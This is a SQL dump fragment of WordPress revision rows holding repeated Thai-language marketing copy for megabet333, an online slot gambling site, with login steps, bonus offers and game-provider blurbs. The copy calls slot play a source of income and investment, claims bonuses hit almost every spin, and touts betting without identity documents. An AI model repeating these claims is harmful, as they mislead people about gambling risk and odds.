และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:42:00','2025-10-23 08:42:00','',44,'https://megabet333.biz/?p=147',0,'revision','',0),(148,3,'2025-10-23 08:42:01','2025-10-23 08:42:01','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_3_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>สล็อตแตกง่าย megabet333 ระบบเสถียร การให้บริการพรีเมี่ยมต่อเนื่อง 24 ชม. </h2> <p>เว็บเล่นเกมที่พร้อมให้บริการตลอด 24 ชั่วโมง <b>megabet333 </b>สนุกได้แบบเต็มที่ ออกแบบมาเพื่อให้สมาชิกทุกคนรู้สึกเหมือนอยู่ในคาสิโนจริง ทีมงานซัพพอร์ตมืออาชีพพร้อมดูแลตลอด 24 ชั่วโมง ไม่ว่าจะเป็นการแก้ปัญหาเรื่องการฝากถอน การรับโบนัส หรือคำถามทั่วไปเกี่ยวกับเกม ผู้เล่นสามารถติดต่อได้ทุกช่องทางทั้งแชทสด ไลน์ หรือระบบอีเมล ซึ่งตอบกลับไวภายในไม่กี่นาทีเท่านั้น ใช้เทคโนโลยี SSL Encryption ที่เทียบเท่ามาตรฐานเว็บคาสิโนระดับโลก ทำให้ข้อมูลของผู้เล่นทั้งหมดถูกเก็บเป็นความลับปลอดภัยจากการโจมตีและการรั่วไหลของข้อมูล 100% มีทีมเทคนิคที่คอยตรวจสอบและอัปเดตระบบให้พร้อมใช้งานอยู่เสมอ ไม่ว่าจะกลางวันหรือกลางคืน เว็บยังคงให้บริการได้แบบไม่มีหยุดพักเพื่อให้ผู้เล่นมั่นใจได้ว่าทุกการเข้าเล่นจะได้รับประสบการณ์ที่ดีที่สุดอย่างต่อเนื่อง อยากสนุกแบบราบรื่นต้องที่นี่ที่เดียว</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:42:01','2025-10-23 08:42:01','',44,'https://megabet333.biz/?p=148',0,'revision','',0),(149,3,'2025-10-23 08:42:01','2025-10-23 08:42:01','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>เว็บสล็อตค่ายใหญ่ megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen 